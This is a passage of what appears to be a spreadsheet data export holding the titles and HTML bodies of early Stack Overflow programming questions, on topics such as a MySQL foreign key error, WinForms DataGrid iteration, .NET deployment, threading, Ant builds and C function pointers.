    end_vendor_no INT(6) NOT NULL COMMENT 'Foreign key to the VENDOR.no for the vendor being shipped to',  
    shipment_duration INT(1) DEFAULT 1 COMMENT 'Duration in whole days shipment will take',  
    price FLOAT(5,5) NOT NULL COMMENT 'Price in US dollars per shipment lbs (down to 5 decimal places)',  
    is_flat_rate TINYINT(1) DEFAULT 0 COMMENT '1 if is flat rate regardless of weight, 0 if price is by lbs',  
    INDEX (shipping_vendor_no),  
    INDEX (start_vendor_no),  
    INDEX (end_vendor_no),  
    FOREIGN KEY (shipping_vendor_no) REFERENCES VENDOR (no),  
    FOREIGN KEY (start_vendor_no) REFERENCES VENDOR (no),  
    FOREIGN KEY (end_vendor_no) REFERENCES VENDOR (no)  
) TYPE = INNODB;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;Edited to remove double primary key definition...&lt;/em&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Yeah, unfortunately that didn't fix it though. Now I'm getting:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Can't create table
  './&lt;em&gt;REMOVED MY DB NAME&lt;/em&gt;/SHIPPING_GRID.frm'
  (errno: 150)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Doing a phpinfo() tells me this for mysql:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Client API version    5.0.45&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Yes, the VENDOR.no is type int(6).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to programmatically iterate datagrid rows?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm suddenly back to WinForms, after years of web development, and am having trouble  with something that should be simple.  I have an &lt;code&gt;ArrayList&lt;/code&gt; of business objects bound to a  Windows Forms &lt;code&gt;DataGrid&lt;/code&gt;.  I'd like the user to be able to edit the cells, and when finished,  press a Save button.  At that point I'd like to iterate the all the rows and columns in the  &lt;code&gt;DataGrid&lt;/code&gt; to find any changes, and save them to the database.  But I can't find a way to  access the &lt;code&gt;DataGrid&lt;/code&gt; rows.  &lt;/p&gt;
&lt;p&gt;I'll also want to validate individual cells real time, as they are edited, but I'm pretty  sure that can be done.  (Maybe not with an &lt;code&gt;ArrayList&lt;/code&gt; as the &lt;code&gt;DataSource&lt;/code&gt;?)  But as for iterating the &lt;code&gt;DataGrid&lt;/code&gt;, I'm quite surprised it doesn't seem possible.&lt;/p&gt;
&lt;p&gt;Must I really stuff my business objects data into datatables in order to use the datagrid?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET 3.5 Redistributable -- 200 MB? Other options?</t>
  </si>
  <si>
    <t>&lt;P&gt;I've been using a lot of new .NET 3.5 features in the work that I've been doing, lately. The application that I'm building is intended for distribution among consumers who will probably not have the latest version (or perhaps &lt;EM&gt;any version&lt;/EM&gt;) of the .NET framework on their machines.&lt;/P&gt;_x000D_
&lt;P&gt;I went to go &lt;A href="http://www.microsoft.com/downloads/details.aspx?FamilyId=333325FD-AE52-4E35-B531-508D977D32A6&amp;amp;displaylang=en"&gt;download the .NET 3.5 redistributable package&lt;/A&gt; only to find out that it's almost &lt;STRONG&gt;&lt;EM&gt;200 MB!&lt;/EM&gt;&lt;/STRONG&gt; This is unacceptable for my application, because it's supposed to be a quick and painless consumer application that installs quickly and keeps a low profile on the user's machine. For users that have .NET 3.5 already installed, our binary downloads have been instantaneous, so far. This 200 MB gorilla will more than quadruple the size of the download. Is there any other option than this redistributable package that I can use to make sure the framework is on the machine that won't take the user out of our "quick and painless" workflow? Our target time from beginning of download to finalizing the install is less than two minutes. Is it just not possible for someone who doesn't already have .NET installed?&lt;/P&gt;</t>
  </si>
  <si>
    <t>Where should I put my log file for an asp.net application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a ASP.NET application that we've written our own logging module for.&lt;/p&gt;
&lt;p&gt;My question is, where is the standard place to write a log file to? I.e. the website will be running as the anonymous user identity (e.g. IUSR on IIS7) and I need a place where I know it'll have permission to write to.&lt;/p&gt;
&lt;p&gt;Cheers,&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to wait for thread complete before continuing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some code for starting a thread on the .NET CF 2.0:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ThreadStart tStart = new ThreadStart(MyMethod);
Thread t = new Thread(tStart);
t.Start();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I call this inside a loop the items complete out of order. How do introduce a wait after &lt;code&gt;t.Start()&lt;/code&gt;, so that the work on the thread completes before the code continues? Will BeginInvoke/EndInvoke be a better option for this than manually creating threads?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Animation in .NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is a good way to perform animation using .NET?&lt;/p&gt;
&lt;p&gt;I would prefer not to use Flash if possible, so am looking for suggestions of ways which will work to implement different types of animation on a new site I am producing.&lt;/p&gt;
&lt;p&gt;The new site is for a magician, so I want to provide animated buttons (Cards turning over, etc.) and also embed video.  Is it possible to do this without using Flash or is this the only real solution?  I would like to keep it as cross-platform and standard as possible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Setting up Continuous Integration with SVN</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What tools would you recommend for setting up CI for build and deployment of multiple websites built on DotNetNuke using SVN for source control? &lt;/p&gt;
&lt;p&gt;We are currently looking at configuring Cruise Control to work with NAnt, NUnit, NCover and Trac as a test case. What other combinations would worth investigating?&lt;/p&gt;
&lt;p&gt;We have full control of our development environment so using some form of CI is certain here but I would also like to convince our production services team that they can reliably deploy to the system test, uat and even production environments using these tools.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I setup Public-Key Authentication?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I setup Public-Key Authentication for SSH?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do you use to Unit-Test your Web UI?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The company I'm currently working for is using &lt;a href="http://selenium.openqa.org/"&gt;Selenium&lt;/a&gt; for Uniting-Testing our User Interface. What do you use to Unit-Test your Web UI and how effective do you find it? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>RSS feeds from Gallery2</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After a couple hours fighting with the &lt;a href="http://gallery.menalto.com/" rel="nofollow"&gt;Gallery2&lt;/a&gt; &lt;a href="http://codex.gallery2.org/Gallery2:Modules:rss" rel="nofollow"&gt;RSS module&lt;/a&gt; and getting only the message, "no feeds have yet been defined", I gave up.  Based on &lt;a href="http://www.google.com/search?q=%22no+feeds+have+yet+been+defined%22" rel="nofollow"&gt;a Google search for "no feeds have yet been defined"&lt;/a&gt;, this is a pretty common problem.  Do you have any tips and/or tricks for getting the Gallery2 RSS module to work?  Or any tips for a relatively-PHP-ignorant developer trying to debug problems with this PHP application?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Some kind of task manager for JavaScript in Firefox 3?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Recently I have been having issues with Firefox 3 on Ubuntu Hardy Heron.&lt;/p&gt;
&lt;p&gt;I will click on a link and it will hang for a while.  I don't know if its a bug in Firefox 3 or a page running too much client side JavaScript, but I would like to try and debug it a bit.&lt;/p&gt;
&lt;p&gt;So, my question is "is there a way to have some kind of process explorer, or task manager sort of thing for Firefox 3?"&lt;/p&gt;
&lt;p&gt;I would like to be able to see what tabs are using what percent of my processor via the JavaScript on that page (or anything in the page that is causing CPU/memory usage).  &lt;/p&gt;
&lt;p&gt;Does anybody know of a plugin that does this, or something similar?  Has anyone else done this kind of inspection another way?&lt;/p&gt;
&lt;p&gt;I know about FireBug, but I can't imagine how I would use it to finger which tab is using a lot of resources.&lt;/p&gt;
&lt;p&gt;Any suggestions or insights?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Packaging Java apps for the Windows/Linux desktop</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing an application in Java for the desktop using the Eclipse SWT library for GUI rendering.  I think SWT helps Java get over the biggest hurdle for acceptance on the desktop: namely providing a Java application with a consistent, responsive interface that looks like that belonging to any other app on your desktop.  However, I feel that packaging an application is still an issue.  &lt;/p&gt;
&lt;p&gt;OS X natively provides an easy mechanism for wrapping Java apps in native application bundles, but producing an app for Windows/Linux that doesn't require the user to run an ugly batch file or click on a .jar is still a hassle.  Possibly that's not such an issue on Linux, where the user is likely to be a little more tech-savvy, but on Windows I'd like to have a regular .exe for him/her to run.&lt;/p&gt;
&lt;p&gt;Has anyone had any experience with any of the .exe generation tools for Java that are out there?  I've tried JSmooth but had various issues with it.  Is there a better solution before I crack out Visual Studio and roll my own?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;  I should perhaps mention that I am unable to spend a lot of money on a commercial solution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you open a file in C++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to open a file for reading, the C++ way. I need to be able to do it for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;text files, which would involve some sort of read line function.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;binary files, which would provide a way to read raw data into a &lt;code&gt;char*&lt;/code&gt; buffer.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How important is W3C XHTML/CSS validation when finalizing work?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Even though I always strive for complete validation these days, I often wonder if it's a waste of time.  If the code runs and it looks the same in all browsers (I use browsershots.org to verify) then do I need to take it any further or am I just being overly anal?&lt;/p&gt;
&lt;p&gt;What level do you hold your code to when you create it for:&lt;/p&gt;
&lt;p&gt;a) yourself
b) your clients&lt;/p&gt;
&lt;p&gt;P.S. Jeff and company, why doesn't stack overflow validate? :)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT: Some good insights, I think that since I've been so valid-obsessed for so long I program knowing what will cause problems and what won't so I'm in a better position than people who create a site first and then "go back and fix the validation problems"&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;I think I may post another question on stack overflow; "Do you validate as you go or do you finish and then go back and validate?" as that seems to be where this question is going&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Printing from a .NET Service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a project right now that involves receiving a message from another application, formatting the contents of that message, and sending it to a printer.  Technology of choice is C# windows service.  The output could be called a report, I suppose, but a reporting engine is not necessary.  A simple templating engine, like StringTemplate, or even XSLT outputting HTML would be fine.  The problem I'm having is finding a free way to print this kind of output from a service.  Since it &lt;em&gt;seems&lt;/em&gt; that it will work, I'm working on a prototype using Microsoft's RDLC, populating a local report and then rendering it as an image to a memory stream, which I will then print.  Issues with that are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Multi-page printing will be a big headache.&lt;/li&gt;
&lt;li&gt;Still have to use PrintDocument to print the memory stream, which is unsupported in a Windows Service (though it may work - haven't gotten that far with the prototype yet)&lt;/li&gt;
&lt;li&gt;If the data coming across changes, I have to change the dataset, and the class that the data is being deserialized into.  bad bad bad.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Has anyone had to do anything remotely like this?  Any advice?  I already posed a question about printing HTML without user input, and after wasting about 3 days on that, I have come to the conclusion that it cannot be done, at least not with any freely available tool.&lt;/p&gt;
&lt;p&gt;All help is appreciated.&lt;/p&gt;
&lt;p&gt;EDIT: We are on version 2.0 of the .NET framework.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Beginners Guide to LINQ</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;During the beta of Stack Overflow, I have seen quite a few questions about LINQ SQL but know nothing about it... it sounds very interesting.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What is LINQ and how do I get started?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Links guides or documentation a bonus :)&lt;/p&gt;
&lt;p&gt;&lt;em&gt;PS: I am a long time C# developer who daily uses Datatables and Parameterized SQL&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Suggestions for Adding Plugin Capability?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a general procedure for programming extensibility capability into your code?&lt;/p&gt;
&lt;p&gt;I am wondering what the general procedure is for adding extension-type capability to a system you are writing so that functionality can be extended through some kind of plugin API rather than having to modify the core code of a system.&lt;/p&gt;
&lt;p&gt;Do such things tend to be dependent on the language the system was written in, or is there a general method for allowing for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ant build scripts, antcall, dependencies, etc</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a build script and as part of that script it copies a jar file to a directory, for ease lets call it the utils jar.  the utils jar is built by another build script sitting in another directory.  What im trying to do have my build script run the utils build script so that I can ensure the utils jar is up to date.&lt;/p&gt;
&lt;p&gt;So I know I need to import the utils build file.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;import file="../utils/build/build.xml" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which doesn't work because the import task, unlike almost every other ant taks, doesn't run from basedir, it runs from the pwd.  So to get around that I have this little ditty, which does successfully import the build file&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  &amp;lt;property name="baseDirUpOne" location=".." /&amp;gt;
  &amp;lt;import file="${baseDirUpOne}/utils/build/build.xml" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So now that ive solved my import problem I need to call the task, well that should be easy right:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;antcall target="utils.package" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;note that in the above, utils is the project name of ../utils/build/build.xml&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;the problem I'm now running into is that ant call doesn't execute in ../utils/build so what I need, and cant find, is a runat property or something similar, essentially:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;antcall target="utils.package" runat="../utils/build" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The reason I need this is that in my utils build file the step to select which code to copy to the jar is based on relative paths so as to avoid hardcoding paths in my ant file. Any ideas? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best implementation for Key Value Pair Data Structure?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I've been poking around with C# a bit lately, and all the Generic Collections have me a little confused. Say I wanted to represent a data structure where the head of a tree was a key value pair, and then there is one optional list of key value pairs below that (but no more levels than these). Would this be suitable?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class TokenTree
{
    public TokenTree()
    {
        /* I must admit to not fully understanding this,
         * I got it from msdn. As far as I can tell, IDictionary is an
         * interface, and Dictionary is the default implementation of
         * that interface, right?
         */
        SubPairs = new Dictionary&amp;lt;string, string&amp;gt;();
    }
    public string Key;
    public string Value;
    public IDictionary&amp;lt;string, string&amp;gt; SubPairs;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It's only really a simple shunt for passing around data.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Not showing Dialog when opening file in Acrobat Pro using Applescript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When opening Adobe Acrobat Pro, whether it be through &lt;strong&gt;Applescript&lt;/strong&gt; or finder, the introductory dialog is shown.  Is there a way to not show this dialog without already having checked the "Don't Show Again" option when opening a document using &lt;strong&gt;Applescript&lt;/strong&gt;?  &lt;/p&gt;
&lt;p&gt;Photoshop and Illustrator &lt;strong&gt;Applescript&lt;/strong&gt; libraries have ways of setting interaction levels and not showing dialogs, but I can't seem to find the option in Acrobat.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get list of domains on the network</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using the Windows API, how can I get a list of domains on my network?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VMWare Server Under Linux Secondary NIC connection</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;With VMWare Server running under Linux (Debain), I would like to have the following setup:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;1st: NIC being used by many of the
images running under VMWare, as well
as being used by the Linux OS &lt;/li&gt;
&lt;li&gt;2nd: NIC being used by only 1 image and to be unused by the Linux OS (as its part of a DMZ)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Although the second NIC won't be used by Linux, it is certainly recognised as a NIC (e.g. eth1).&lt;/p&gt;
&lt;p&gt;Is this possible under VMWare Server, and if so, is it as simple as not binding eth1 under Linux and then bridging it to the image under VMWare Server?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SharePoint WSS 3.0 Integration with Mac OSX (either Safari or Firefox)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a SharePoint WSS site and some of our users on on the Mac OSX platform.  Are there any tips or tricks to get a similar experience to Windows with document shares and calendars on the Mac?&lt;/p&gt;
&lt;p&gt;Edit: Browsing a SharePoint WSS site on a Mac, whether using Firefox or Safari, has a very similar look and feel as it does on Windows IE.  The similar experience I am looking for has to do with integrating the calendars, document shares, etc. into the desktop.&lt;/p&gt;
&lt;p&gt;For example, with IE you can go to a calendar and select "Actions -&gt; Connect to Outlook" and it will make the calendar visible and manageable from within Outlook.&lt;/p&gt;
&lt;p&gt;Is there any way to get the Mac to work similarly?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Accessing iSight programatically?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to access the iSight camera on a macbook programatically? By this I mean I would like to be able to just grab still frames from the iSight camera on command and then do something with them. If so, is it only accessible using objective c, or could other languages be used as well? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Interfaces on different logic layers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say you have an application divided into 3-tiers: GUI, business logic, and data access. In your business logic layer you have described your business objects: getters, setters, accessors, and so on... you get the idea. The interface to the business logic layer guarantees safe usage of the business logic, so all the methods and accessors you call will validate input. &lt;/p&gt;
&lt;p&gt;This great when you first write the UI code, because you have a neatly defined interface that you can trust.&lt;/p&gt;
&lt;p&gt;But here comes the tricky part, when you start writing the data access layer, the interface to the business logic does not accommodate your needs. You need to have more accessors and getters to set fields which are/used to be hidden. Now you are forced to erode the interface of your business logic; now it is possible set fields from the UI layer, which the UI layer has no business setting. &lt;/p&gt;
&lt;p&gt;Because of the changes needed for the data access layer, the interface to the business logic has eroded to the point where it is possible to even set the business logic with invalid data. Thus, the interface does not guarantee safe usage anymore.&lt;/p&gt;
&lt;p&gt;I hope I explained the problem clearly enough. How do you prevent interface eroding, maintain information hiding and encapsulation, and yet still accommodate different interface needs among different layers? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you pass a function as a parameter in C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to create a function that performs a function passed by parameter on a set of data. How do you pass a function as a parameter in C?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What libraries do I need to link my mixed-mode application to?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm integrating .NET support into our C++ application.&lt;br /&gt;
It's an old-school MFC application, with 1 extra file compiled with the "/clr" option that references a CWinFormsControl.&lt;/p&gt;
&lt;p&gt;I'm not allowed to remove the linker flag "/NODEFAULTLIB".&lt;br /&gt;
(We have our own build management system, not Visual Studio's.)&lt;br /&gt;
This means I have to specify all necessary libraries: VC runtime and MFC.&lt;/p&gt;
&lt;p&gt;Other compiler options include "/MD"&lt;/p&gt;
&lt;p&gt;Next to that: I can't use the linker flag "/FORCE:MULTIPLE" and just add &lt;em&gt;everything&lt;/em&gt;:&lt;br /&gt;
I'm looking for a non-overlapping set of libraries.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Lisp/Scheme interpreter without Emacs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;br /&gt;
I've been wanting to teach myself Lisp for a while.  However, all the interpreters of which I've heard involve some flavor of emacs.
Are there any command line interpreters, such that I could type this into the command line:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;lispinterpret sourcefile.lisp&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;just like I can run perl or python.&lt;/p&gt;
&lt;p&gt;While I'd also like to become more familiar with Emacs (if only not to be frustrated when I work with somebody who uses Emacs), I'd rather decouple learning Emacs from learning Lisp.&lt;/p&gt;
&lt;p&gt;Edit: I actually want to follow SICP which uses Scheme, so an answer about Scheme would be more useful.  I'm just not that familiar with the differences.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I reverse the ON bits in a byte?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was reading Joel's book where he was suggesting as interview question:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Write a program to reverse the "ON" bits in a given byte.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I only can think of a solution using C. &lt;/p&gt;
&lt;p&gt;Asking here so you can show me how to do in a Non C way (if possible)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to return a page of results from SQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Many applications have grids that display data from a database table one page at a time. Many of them also let the user pick the number of records per page, sort by any column, and navigate back and forth through the results.&lt;/p&gt;
&lt;p&gt;What's a good algorithm to implement this pattern without bringing the entire table to the client and then filtering the data on the client. How do you bring just the records you want to display to the user?&lt;/p&gt;
&lt;p&gt;Does LINQ simplify the solution?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Checking for string contents? string Length Vs Empty String</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Which is more efficient for the compiler and the best practice for checking whether a string is blank? &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Checking whether the length of the string == 0&lt;/li&gt;
&lt;li&gt;Checking whether the string is empty (strVar == "")&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Also, does the answer depend on language?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the useful new ASP.NET features in the .NET Framework 3.5?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've kept up to date with new features in the C# language as it's moved from version 1 through version 3.  I haven't done such a good job keeping up to date with ASP.NET.  I feel like some of the post version 1 features are not so good (e.g. the AJAX framework) or are just not that useful to me (e.g. the membership framework).  Can anyone recommend any new killer ASP.NET features that might have gone unnoticed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Validating posted form data in the ASP.NET MVC framework</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been playing around with the ASP.NET MVC Framework and the one thing that's really confusing me is how I'm meant to do server side validation of posted form data.  I presume I don't post back to the same URL, but if I don't, how do I redisplay the form with the entered data and error messages?  Also, where should the validation logic go?  In the model or the controller?  This seems to be one of the few areas where web forms are much stronger (I miss the validation controls).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the difference between Early and Late Binding?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the difference between early and late binding?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best database storage device?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So, the answer should probably be presented in tiers for the size of the application, but I'm wondering about people's experience with choosing where the disk drives used by the database should reside.&lt;/p&gt;
&lt;p&gt;Here are some of the options:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;JBOD - (just a bunch of disks) Old fashioned internal disks - fast but not very expandable&lt;/li&gt;
&lt;li&gt;NAS - Slow but cheap and expandable, probably best for backups&lt;/li&gt;
&lt;li&gt;DAS - A decent compromise, but generally accessible from only one or two machines&lt;/li&gt;
&lt;li&gt;SAN - Expensive but very good&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;How much should you worry about choosing a 15k drive over a 10k or 7200RPM?&lt;/p&gt;
&lt;p&gt;What's your favorite RAID level?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Pre-built regular expression patterns or Regex Libraries?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone use have a good regex library that they like to use? Most of the regexes that you find online either contain bugs or are so focused on the edge cases that it turns into a competition to validate whatever spec 100%. Of course you can write your own, but when you are billing by the hour its handy to have a library around. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Asynchronous Remoting calls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a remoting singleton server running in a separate windows service (let's call her RemotingService). The clients of the RemotingService are ASP.NET instances (many many).&lt;/p&gt;
&lt;p&gt;Currently, the clients remoting call RemotingService and blocks while the RemotingService call is serviced. However, the remoting service is getting complicated enough (with more RPC calls and complex algorithms) that the asp.net worker threads are blocked for a significantly long time (4-5 seconds).&lt;/p&gt;
&lt;p&gt;According to &lt;a href="http://msdn.microsoft.com/en-us/magazine/cc164128.aspx"&gt;this msdn article&lt;/a&gt;, doing this will not scale well because an asp.net worker thread is blocked for each remoting RPC. It advises switching to async handlers to free up asp.net worker threads.&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The purpose of an asynchronous handler
  is to free up an ASP.NET thread pool
  thread to service additional requests
  while the handler is processing the
  original request.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This seems fine, except the remoting call still takes up a thread from the thread pool.
Is this the same thread pool as the asp.net worker threads? &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How should I go about turning my remoting singleton server into an async system such that I free up my asp.net worker threads?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I've probably missed out some important information, please let me know if there is anything else you need to know to answer the question.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a difference between the on_exit() and atexit() functions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any difference between&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   int on_exit(void (*function)(int , void *), void *arg);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   int atexit(void (*function)(void));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;other than the fact that the function used by on_exit gets the exit status?&lt;/p&gt;
&lt;p&gt;That is, if I don't care about the exit status, is there any reason to use one or the other?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; Many of the answers warned against &lt;code&gt;on_exit&lt;/code&gt; because it's non-standard. If I'm developing an app that is for internal corporate use and guaranteed to run on specific configurations, should I worry about this? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why do I get the error "Unable to update the password" when calling AzMan?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm doing a authorization check from a WinForms application with the help of the AzMan authorization provider from Enterprise Library and am receiving the the following error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Unable to update the password. The value provided as the current password is incorrect. (Exception from HRESULT: 0x8007052B) (Microsoft.Practices.EnterpriseLibrary.Security.AzMan) &lt;/p&gt;
  &lt;hr&gt;
  &lt;p&gt;Unable to update the password. The value provided as the current password is incorrect. (Exception from HRESULT: 0x8007052B) (Microsoft.Interop.Security.AzRoles) &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The AzMan store is hosted in ADAM on another computer in the same domain. Other computers and users do not have this problem. The user making the call has read access to both ADAM and the AzMan store. The computer running the WinForms app and the computer running ADAM are both on Windows XP SP2.&lt;/p&gt;
&lt;p&gt;I've had access problems with AzMan before that I've resolved, but this is a new one... What am I missing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Data Layer Best Practices</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am in the middle of a "discussion" with a colleague about the best way to implement the data layer in a new application.&lt;/p&gt;
&lt;p&gt;One viewpoint is that the data layer should be aware of business objects (our own classes that represent an entity), and be able to work with that object natively.  &lt;/p&gt;
&lt;p&gt;The opposing viewpoint is that the data layer should be object-agnostic, and purely handle simple data types (strings, bools, dates, etc.)&lt;/p&gt;
&lt;p&gt;I can see that both approaches may be valid, but my own viewpoint is that I prefer the former.  That way, if the data storage medium changes, the business layer doesn't (necessarily) have to change to accommodate the new data layer.  It would therefore be a trivial thing to change from a SQL data store to a serialized xml filesystem store.&lt;/p&gt;
&lt;p&gt;My colleague's point of view is that the data layer shouldn't have to know about object definitions, and that as long as the data is passed about appropriately, that is enough.  &lt;/p&gt;
&lt;p&gt;Now, I know that this is one of those questions that has the potential to start a religious war, but I'd appreciate any feedback from the community on how you approach such things.  &lt;/p&gt;
&lt;p&gt;TIA&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I "unaccept" a drag in Flex?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Once I've called &lt;code&gt;DragManager.acceptDrag&lt;/code&gt; is there any way to "unaccept" the drag? Say that I have a view which can accept drag and drop, but only in certain areas. Once the user drags over one of these areas I call &lt;code&gt;DragManager.acceptDrag(this)&lt;/code&gt; (from a &lt;code&gt;DragEvent.DRAG_OVER&lt;/code&gt; handler), but if the user then moves out of this area I'd like to change the status of the drag to not accepted and show the &lt;code&gt;DragManager.NONE&lt;/code&gt; feedback. However, neither calling &lt;code&gt;DragManager.acceptDrag(null)&lt;/code&gt; nor &lt;code&gt;DragManager.showFeedback(DragManager.NONE)&lt;/code&gt; seems to have any effect. Once I've accepted the drag an set the feedback type I can't seem to change it.&lt;/p&gt;
